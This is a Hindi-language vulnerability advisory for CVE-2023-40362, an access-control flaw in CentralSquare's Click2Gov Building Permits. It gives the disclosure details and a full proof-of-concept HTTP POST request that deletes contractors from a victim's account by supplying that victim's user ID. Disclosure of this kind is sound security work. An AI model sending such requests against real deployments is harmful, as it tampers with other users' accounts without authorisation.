
CVE-2023-40362 भेद्यता विवरण और प्रूफ ऑफ कॉन्सेप्ट
CVE-2023-40362 भेद्यता विवरण और प्रूफ-ऑफ-कॉन्सेप्ट।
/Click2GovBP/mastercontractorlist.html URI पर Click2Gov BP में एक एक्सेस नियंत्रण भेद्यता के कारण प्रमाणित उपयोगकर्ता पीड़ित की उपयोगकर्ता आईडी और हटाए जाने वाले कॉन्ट्रैक्टर की जानकारी के साथ अन्य उपयोगकर्ताओं के खातों से कॉन्ट्रैक्टरों को
हटा सकते हैं।
यह वेब एप्लिकेशन द्वारा यह सत्यापित करने में विफलता के कारण होता है कि उपयोगकर्ता उस खाते से कॉन्ट्रैक्टर को हटाने के लिए अधिकृत है या नहीं, जिसकी उपयोगकर्ता आईडी निर्दिष्ट की गई है।
विक्रेता: CentralSquare
रिपोर्टकर्ता: Ally Petitt
खोज की तिथि: 13 जून, 2023
प्रभावित उत्पाद: Click2Gov Building Permits (BP)
प्रभावित रिलीज़: अक्टूबर 2023 से पहले
CVSS v3: 5.4 - मध्यम (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L)
नीचे दिखाया गया HTTP POST अनुरोध पीड़ित के खाते से कॉन्ट्रैक्टर को हटाने के लिए किया जा सकता है। इसके काम करने के लिए CSRF टोकन मान्य होना चाहिए।
POST /Click2GovBP/mastercontractorlist.html HTTP/1.1
Host: <HOST>
Cookie: welcome=true; JSESSIONID=<SESSION_ID>;
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: <USER_AGENT>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
contractorList%5B0%5D.number=<CONTRACTOR_NUMBER>&contractorList%5B0%5D.type=<CONTRACTOR_TYPE>&contractorList%5B0%5D.name=<CONTRACTOR_NAME>&submitRemoveContractor=true&confirmRemoveContractor=true&userId=<USER_ID>&OWASP_CSRFTOKEN=<CSRF_TOKEN>